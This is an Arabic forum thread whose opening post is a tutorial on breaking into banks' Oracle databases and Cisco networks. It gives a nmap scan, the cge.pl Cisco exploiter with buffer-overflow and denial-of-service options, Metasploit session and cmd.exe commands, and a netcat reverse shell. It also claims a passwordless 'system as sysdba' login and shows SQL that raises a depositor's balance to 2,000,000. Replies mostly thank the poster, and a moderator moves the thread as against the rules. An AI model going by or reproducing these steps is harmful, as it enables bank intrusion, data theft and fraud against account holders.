أختراق البنوك وأنظمة قواعد البيانات dbms شرح بالصور + الادوات + تطبيق

تم تحميل الصفحة في 0,4231464 ثانية
أختراق البنوك وأنظمة قواعد البيانات dbms شرح بالصور + الادوات + تطبيق
الحالة
مغلق و غير مفتوح للمزيد من الردود.

شاجع

Beginner Developer
rank
إنضم
16 أغسطس 2007
المشاركات
18
الإعجابات
25
النقاط
0
[FONT=&quot]السلام عليكم
طبعا لقد تم سرقة الشرح من قبل هاكر يدعى ريموتر ولكن الحق باين
[/FONT]
[FONT=&quot]حبيت ان أفيد كل هاكر مسلم محصور في أشياء صغيره في عالم الهاكر ويريد آن يتوسع من اجل ان ننافس قراصنة الغرب[/FONT]
[FONT=&quot]الموضوع عباره عن مقدمه في اختراق البنوك وأنظمة قواعد البيانات والمشهوره [/FONT]oracle [FONT=&quot] التي تستخدمها البنوك والشركات[/FONT]
[FONT=&quot]المتطلبات والادوات للموضوع[/FONT]
Backtrack
sploit
Skills
Hacking skills
[FONT=&quot]خبره في لغة [/FONT]sql[FONT=&quot] وقواعد البيانات[/FONT]
[FONT=&quot]خبره في نظام [/FONT]linux
[FONT=&quot]لكي تستفيد من الموضوع يجب عليك قرائه كل سطر وفهمه والتركيز[/FONT]
[FONT=&quot]ولكي تصبح متقن لأختراق في المستوى العاالي يجب عليك ملم بخيره ولو جديه بلغة [/FONT]sql
[FONT=&quot]و [/FONT]oracle sql [FONT=&quot] ومعرفه قويه في اوامر نظام التشغيل [/FONT]linux
[FONT=&quot]لأن البنوك والشركات تستخدم قواعد بيانات [/FONT]oracle sql [FONT=&quot] و [/FONT]sql servermicrosoft[FONT=&quot] وشبكات السيسكو [/FONT]cisco[FONT=&quot] ولكي تستطيع التحكم يجب عليك المعرفة بهذه الانظمه[/FONT]
[FONT=&quot]في هاكرز عرب كثير لا يفهم في البرمجه ولا السيطره على انظمه اللينكس ويريد اختراق بنوك[/FONT]
[FONT=&quot]لو جبت لك جهاز بنك او شركه ونت لا تعرف اللينكس ولا الاوراكل اس كي وال ما رح تقدر تسوي شي ولو معاك كل الباسوردات[/FONT]
[FONT=&quot]من هنا ينطلق الموضوع[/FONT]
[FONT=&quot]بسم الله نبداء[/FONT]
[FONT=&quot]قبل أي شي في أي خطوه لأختراق نظام هي معرفة مكوناته [/FONT]software[FONT=&quot] لأن الثغرات هي تصيب البرمجيات[/FONT]
[FONT=&quot]وهناك طرق اخرى للأختراق من دون ثغرات مثل الدخول العنيف[/FONT]
[FONT=&quot]جبت لكم جدول يبين الانظمه المستخدمه في الشركات والبنوك وشركة الاتصالات في الاغلب[/FONT]
[FONT=&quot]طبعا الشرح رح يهتم على انظمة اوراكل لقواعد البيانات والسيسكو وكمان بعض الثغرات[/FONT]
[FONT=&quot]طبعا اثمن شي في البنوك والشركات هي قواعد البيانات[/FONT]
[FONT=&quot]وهذا ما رح يتمركز الحوار[/FONT]
[FONT=&quot]وكيفية ايجاد الشبكات المصابه وهذا سهل رح اشرحه لكم ايضا[/FONT]
[FONT=&quot]والادوات المستخدمه في الشرح هي نظام الباك تراك والميتاسبوليت[/FONT]
[FONT=&quot]::::الخطوه الاولى:::::::[/FONT]
[FONT=&quot]فحص الهدف [/FONT]
[FONT=&quot]وهي كالعاده عمل اسكان عبر الايبي وهذي الخطوه تستخدم في جميع الاختراقات سواء مواقع او سيرفرات او اجهزة[/FONT]
[FONT=&quot]طبعا في النوك والشركات تفحص البرامج المركبه والبورتات المفتوحه[/FONT]
[FONT=&quot]ورح نستخدم اداة [/FONT]nmap
[FONT=&quot]طبعا ما رح اشرح الاداه لأنك لما تشوف هذا الموضوع على الاقل تكون فاهم الاساسيات وما رح اشرح للمبتدئن كيف [/FONT]
[FONT=&quot]يلا رح انازل ههههههه تسوي الامر[/FONT]
Nmap –sV xx.xx.xx.xx
[FONT=&quot]شوفوا لصوره هذي[/FONT]

[FONT=&quot]=-=-=-==-=-=-=-=-[/FONT]
[FONT=&quot]الان عرفنا ان الهدف معاهم نضام اوراكل[/FONT]
[FONT=&quot]وكمان هناك سيرفرات تحتوي على نضام السيسكو[/FONT]
[FONT=&quot]والان عرفنا الهدف ايش مركب من نضام[/FONT]
[FONT=&quot]قبل ما ندخل في التطبيق رح اشرح انواع الانضمه[/FONT]
[FONT=&quot]اولا انظمة قواعد البيانات[/FONT]
[FONT=&quot]هناك شركات صنعت [/FONT]DBMS [FONT=&quot] والي تدير قواعد البيانات[/FONT]
[FONT=&quot]مثل شركة ارواكل وميكروسوفت[/FONT]
[FONT=&quot]وهناك انظمه مخصصه مثل انظمه وزارة الدفاع الامريكيه[/FONT]
[FONT=&quot]شوفو هذا واجهة النظام مخصص[/FONT]

[FONT=&quot]ومثلا انظمه الاوراكل هذي واجه لتسجيل الدخول[/FONT]

[FONT=&quot]طبعا لأقتحام أي نضام لازم تعرف اول شي كيف تتصل للنضام وماذا يريد النضام منك للأتصال[/FONT]
[FONT=&quot]طبعا انا ما رح اشرح الحاجات الاساسيه في هذه الدوره بس بشرح النقاط التي تمكنك من فهم اختراق الانظمه للمؤسسات والشركات[/FONT]
[FONT=&quot]الان نتوجه الى الخطوه الثانيه[/FONT]
[FONT=&quot]:::::الخطوه الثانيه الاختراق:::::::[/FONT]
[FONT=&quot]رح ابداء معاكم في اختراق شبكات السيسكو الي اغلب الشركات تعمل عليها[/FONT]
[FONT=&quot]طبعا لأختراق شبكات السيسكو هناك اداوت موجوده على الباك تراك[/FONT]
[FONT=&quot]ونت لازم يكون معاك نضام اختراق قوي مثل الباك تراك للهجوم من هذا النوع[/FONT]
[FONT=&quot]نفتح الباك تراك[/FONT]
[FONT=&quot]نفتح الشل ونتوجه للمسار[/FONT]
Cd /pentest/cisco/cisco-global-exploiter
[FONT=&quot]طبعا توجد اداه اسمها[/FONT]
Cge.pl
[FONT=&quot]هذي هي اداة الاختراق لشبكات السيسكو الي تستثمر عدة انواع من الثغرات مثل البفر وكمان تعمل هجوم نكران الخدمه يهني توقف الشبكاه كامل[/FONT]
[FONT=&quot]لكي تشغل الاداه تكتب الامر[/FONT]
Perl cge.pl
[FONT=&quot]ورح يشرح لك الاستخدام والثغرات بالترقيم[/FONT]
[FONT=&quot]شاهد الصوره[/FONT]

[FONT=&quot]طبعا استخدام الاده تكون[/FONT]
[FONT=&quot]هي[/FONT]
Perl cge.pl xx.xx.xx.xx option
[FONT=&quot]نوع الهجوم[/FONT]Option=
[FONT=&quot]بعد ماختار نوع الهجوم مثل [/FONT]buufer overflow
[FONT=&quot]والاتصال العكسي او التل نت[/FONT]
[FONT=&quot]او انك تختار [/FONT]
Denial of services[FONT=&quot] توقف عمل الشبكه وتشلها[/FONT]
[FONT=&quot]طبعا اهم شي انك توصل للمعومات وهذا اهم شي يهم المهاجم[/FONT]
[FONT=&quot]ونت لازم تحاول للأتصال عكسيا وهذا اهم شي وسوف تعرفون السبب في بقيه الدوره[/FONT]
[FONT=&quot]الان عرفنا من اهم الخطوات في بداية الاختراق [/FONT]
[FONT=&quot]خلونا نراجع[/FONT]
[FONT=&quot]نسوي اسكان[/FONT]
[FONT=&quot]نعرف البرامج المركبه على الهدف[/FONT]
[FONT=&quot]ايجاد ثغرات البرامج الانظمه [/FONT]
[FONT=&quot]استثمار ثغرات الانظمه او البرامج المركبه[/FONT]
[FONT=&quot]تم الاقتحام يعني وصلنا للجهاز[/FONT]
[FONT=&quot]الان كل الي شرحناه انت المفروض تكون عارفه وأكيد ما تتوقع ان اختراق انظمة المؤسسات والشركات بهذه السهوله ومثل أي اختراق[/FONT]
[FONT=&quot]بس الصعوبه بعد ما تقتحم النظام[/FONT]
[FONT=&quot]ايش هي الاجرائات الي رح تسويها[/FONT]
[FONT=&quot]=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[/FONT]
[FONT=&quot]::::الخطوه الثالثه الهجوم على النظام::::[/FONT]
[FONT=&quot]قبل ما تبداء الهجوم على الانظمه[/FONT]
[FONT=&quot]اولا اعرف ماذا تريد الحصول عليه وما هو نوع النظام وكيفية الدخول اليه[/FONT]
[FONT=&quot]طبعا رح اشرح لكم اسهل شي وهو اقتحام اشهر انظمة ادارة قواعد البيانات وهي الاوراكل والاغلب المستخدمه في الشركات[/FONT]
[FONT=&quot]الان رح نبداء الهجوم [/FONT]
[FONT=&quot]اول رح نبداء كيف نجمع معلومات قد تحتاجها في بعض العمليات في اختراق قواعد البيانات[/FONT]
[FONT=&quot]مثلا اشهر شي وهي [/FONT]SID [FONT=&quot]وأيجاده سهل جدا عبر الميتا سبلويت ونحن لن نحتاجه في علمية الاختراق تبعنا في اخر الدرس ولكن مجرد شرح قد تحتاجه في المستقبل[/FONT]
[FONT=&quot]ما رح اشرح كثير انتم اكتفو باهذي الصورتين[/FONT]

[FONT=&quot]وهذه الصوره بعد التنفيذ[/FONT]

SID=orcl
SID=PLProc
[FONT=&quot]وهناك ادوات كثيره مساعده في اختراق الاوراكل اكتب انت في [/FONT]console
[FONT=&quot]الامر [/FONT]search oracle
[FONT=&quot]ورح تظهر لك كل الثغرات التي نزلت على هذي الانظمه وكمان ادوات مساعده[/FONT]
[FONT=&quot]طبعا [/FONT]SID [FONT=&quot] رح يساعدك في اقتحام باسورد النظام ولكن انا بجيب لك طرق تقتحم النظام من دون باسورد[/FONT]
[FONT=&quot]والتي تدعهما اداه في الباك تراك اسم الاداه والمسار موجود في الصوره[/FONT]


[FONT=&quot]طبعا انت حاول توصل للاتصال للسيرفر من عبر أي ثغره او انك تخترق السيرفر عبر ال [/FONT]Fast Track [FONT=&quot] في الباك تراك [/FONT]
[FONT=&quot]وهذي اخر الخطوات في الاختراق سواء عبر الفاست تراك في الباك تراك او عبر الميتا سبلويت[/FONT]
[FONT=&quot]واهم شي في الصور كما رح تشوفوا انه دخلنا للدوز تبع الضحيه[/FONT]

[FONT=&quot]طبعا نكتب الامر[/FONT]
Sessions –l
[FONT=&quot]لعرض الاتصالات المتكونه[/FONT]
[FONT=&quot]ولدخول للاتصال نكتب[/FONT]
Session –I 1
[FONT=&quot]حيث 1 رقم الاتصال ويمكن ان يكون معاك عدة اتصالات[/FONT]
[FONT=&quot]الصوره السابقه لنجاح استثمار ثغره من الثغرات والاتصال [/FONT]meterpreter
[FONT=&quot]اما الصوره هذي للدخول الى النظام للدوز بالامر[/FONT]
Use –m process
Execute –f cmd.exe
[FONT=&quot]في حالة عدم الدخول للدوز تبع الضحيه تنفذ الامر[/FONT]
Interact 1
[FONT=&quot]كما في الصوره[/FONT]


[FONT=&quot]او ان نتصل اتصال عكسي عبر النت كات بتنفيذ [/FONT]lcode [FONT=&quot] طبعا بعد اختراق للسيرفر عبر ثغره [/FONT]buffer overflow
[FONT=&quot]بدايه نقوم بالتنصت[/FONT]


[FONT=&quot]بعد نجاح الاتصال[/FONT]


[FONT=&quot]الان تم الاختراق والخطوه القادمه في الجزء التالي من الشرح[/FONT]
[FONT=&quot]؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟[/FONT]
[FONT=&quot]طبعا الان وصلنا الى المطلوب وهو النظام السؤال الان كيف ندخل الى نظام قواعد البيانات لكي نسوي الي جينا من اجله ^_^[/FONT]
[FONT=&quot]في انظمه الاواكل تستطيع الوصول للنظام عبر الدوز بالأمر[/FONT]
Sqlplus
[FONT=&quot]وهذا هو أهم أمر ورح يدخلك الى نظام قواعد البيانات[/FONT]
[FONT=&quot]طبعا اكيد رح يطلب منك اليوزر والباسورد[/FONT]
[FONT=&quot]هنا للأقتحام معانا طريقتين [/FONT]
[FONT=&quot]الطريقه الاولى انك تكتب اليوزر [/FONT]system
[FONT=&quot]وهو اسم المستخدم للنظام في الانظمه الاوراكل[/FONT]
[FONT=&quot]وتخمن الباسورد او تستخدم طريقة ملك الهاكرز كيفن ميتنك في الهندسه الاجتماعيه كان يتصل لأحد الموضفين ويقول انه من احد جهات الصيانه ويطلب اليوزر والباسورد بس هذا شي صار صعب وحتى لو كان ينفع نادرا[/FONT]
[FONT=&quot]الطريقه الثانيه وهي الأضمن للاقتحام انك تكتب في خانة المستخدم[/FONT]
System as sysdba
[FONT=&quot]وهي اختصار الى[/FONT]
System administration
[FONT=&quot]يعني مدير النظام[/FONT]
[FONT=&quot]وتضغط [/FONT]enter [FONT=&quot] ورح يطلب الباسورد ونت طنش وضغط [/FONT]enter [FONT=&quot] مره اخره ورح تدخل من دون طلب كلمة السر[/FONT]
[FONT=&quot]كما في الصوره[/FONT]


[FONT=&quot]مبروك عليك الاقتحام انت الان صرت داخل النظام بصلاحية مدير النظام اكبر صلاحيه يعني تقدر تستعرض الملومات وتعدل وكل شي وهذا الي يهم المقتحم[/FONT]
[FONT=&quot]طبعا الان انت مخترق النظام من اجل استعراض جدول معين او سرقة معلومات او تعديل على معلومات مثلا تعديل على ارصده ومعاك الصلاحيات بس واجهت مشكله معرفة الجداول[/FONT]
[FONT=&quot]رح نضرب مثل وليكن التعديل على الرصيد ولا تعرف اسم الجدول او صيغة الجدول كيف هي[/FONT]
[FONT=&quot]المشكله هذي تحل بسهوله [/FONT]
[FONT=&quot]مع كتابة الامر[/FONT]
SELECT * FROM user_catalog;
[FONT=&quot]طبعا رح تظهر لك الجداول غير مرتبه ولكي تعرضها مرتبه ننفذ الامر [/FONT]
select *from cat
order by TABLE_NAME;
[FONT=&quot]كما في الصوره[/FONT]
[FONT=&quot]
[/FONT]


[FONT=&quot]طبعا يعرض كل الجداول ونت شوف الجدول الي تريد تستعرض المعلومات منه او التعديل عليه[/FONT]
[FONT=&quot]طبعا للعلم ان البنوك تستخدم الجدول اليه فيه المعلومات المهمه عن الرصيد [/FONT]depositor
[FONT=&quot]والتي تعني المودعون[/FONT]
[FONT=&quot]ويختلف من نضام الى نظام مثلا قد يكون [/FONT]accounts or clients
[FONT=&quot]طيب الان وجدنا الجدول المطلوب لكي تعرف الاعمده الي فيه والبيانات تكتب الامر[/FONT]
Desc depositor
[FONT=&quot]ورح يعرض لك معلومات الجدول كما في الصوره[/FONT]
[FONT=&quot]
[/FONT]

[FONT=&quot]الان عدينا مرحله بل مراحل طوال لكي نوصل الى ما وصلنا اليه الان وسوف نقوم حاليا بالاستعلام على رصيد احد العملاء وليكن اسمه [/FONT]john[FONT=&quot] الذي يحمل الرقم 1009[/FONT]
[FONT=&quot]الان نريد نستخرج اسم العميل والرصيد المتوفر له[/FONT]
[FONT=&quot]بنسوي الامر[/FONT]
Select name,balance from depositor where id=1009;
[FONT=&quot]طبعا لكي تعرض كل المعلومات تختصر الامر وتسوي * بدل اسماء الاعمده[/FONT]
[FONT=&quot]شاهدو الصوره[/FONT]

[FONT=&quot]الان نريد نرفع الرصيد الى 2 مليون طبعا انت لازم يكون معاك خبره في اوامر [/FONT]sql [FONT=&quot]ورح ننفذ امر التحديث والي هو [/FONT]update [FONT=&quot] ورح تكون الصيغه[/FONT]
Update depositor
Set balance=2000000
Where id=1009;
[FONT=&quot]ورح تضهر لك رساله تم التعديل بس في الشرح الرساله مش معرفه بالغه النظام المخترق[/FONT]
[FONT=&quot]كما في الصوره

[/FONT]


[FONT=&quot]الان نتأكد من التعديل وننفذ الامر الاول[/FONT]


DONE
[FONT=&quot]هذا فيديوا في اختراق بنك ليس كما شرحناه باختراق اوراكل وأنما [/FONT]sql server [FONT=&quot] تبع شركة مايكروسوفت[/FONT]
[FONT=&quot]نفس الخطوات فحص واستثمار الثغرات وقتحام النظام[/FONT]
[FONT=&quot]الفيديوا
http://www.37mb.com/download.php?id=68

[/FONT]
[FONT=&quot]والى هنا وصلنا الى نهاية المطاف وهذا ليس كل الطرق التي يتم بها الاختراق وهناك طرق اخرى مثل [/FONT]Remote client[FONT=&quot] وهي طريقه معقده شويه[/FONT]
[FONT=&quot]الشرح كان محاكاه الى واقع الاختراق العملي وأهم شي من الشرح كان فهم الفكره في الاختراق والخطوات الصحيحه للهجوم وهذا ما ينقص الهاكر وانا متأكد من اغلب الخطوات كانت معرفوه لدى الهاكر متوسطي المستوى والمحترفين بس النقص كان كيف يشغل المهارات ..[/FONT]
[FONT=&quot]وانا هنا اتوقف عن الشرح وأرجوا الاستخدام فيما ينفع الامه الاسلاميه وليس ما يضرها


تحميل الشرح بصيغة كتاب pdf
[/FONT]
[FONT=&quot]http://www.mediafire.com/?olr77dw3pq4en5i

[/FONT]
[FONT=&quot]اسطورة صنعاء/[/FONT]
[FONT=&quot]شـــــــــاجــــــــــع[/FONT]



 
إنضم
17 أغسطس 2010
المشاركات
266
الإعجابات
15
النقاط
0
رد: أختراق البنوك وأنظمة قواعد البيانات dbms شرح بالصور + الادوات + تطبيق

شكراً لك اخ شاجع

مع انه منقول لاكن شكراً لك .. :32:
 
إنضم
16 مايو 2008
المشاركات
3,864
الإعجابات
210
النقاط
63
رد: أختراق البنوك وأنظمة قواعد البيانات dbms شرح بالصور + الادوات + تطبيق

اعتقد مخالف لـ وجود اعلان لـ موقع اخر على روابط الصور ..

شكرا اخوي شاجع
 

zorax

Beginner Developer
rank
إنضم
11 مارس 2011
المشاركات
48
الإعجابات
7
النقاط
0
رد: أختراق البنوك وأنظمة قواعد البيانات dbms شرح بالصور + الادوات + تطبيق

اخي مشكو على موضوعك لكن لتميز الديف بوينت وتميز هذا القسم خصوصا يمنع وضع المواضيع المنقولة لسنوا الوحيدون ولكننا الافضل
 

slsl

Beginner Developer
rankrank
إنضم
14 يوليو 2008
المشاركات
337
الإعجابات
23
النقاط
0
رد: أختراق البنوك وأنظمة قواعد البيانات dbms شرح بالصور + الادوات + تطبيق

مشكووور الك بس انا متاكد لو طبقته 1000 مره ما راح افهم وما راح يضبط لانه صعب جدااااا :2:
 
إنضم
15 يناير 2010
المشاركات
4,427
الإعجابات
722
النقاط
113
الإقامة
][ Saudi Arabia ][
رد: أختراق البنوك وأنظمة قواعد البيانات dbms شرح بالصور + الادوات + تطبيق

وعليكم السـلام ورحمة الله وبركاته ،

أولاً الله يعطيك العافية حبيبي [ شاجع ] ، موضوع مفيد وفي قمة الروعة ، ولكن إسمح لي بنقل الموضوع لقسم المواضيع المخالفة ،

لأنه مخالف لأكثر من قانون من قوانين المنتدى والقسم ، يمنع وضع روابط لأي موقع على الصور ، ويمنع طرح المواضيع المختصة في إختراق المواقع ،

بعد إذنك حبيبي جاري نقل الموضوع لقسم المواضيع المخالفة ، وسلمت يمناك ،

:32:
 
الحالة
مغلق و غير مفتوح للمزيد من الردود.

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل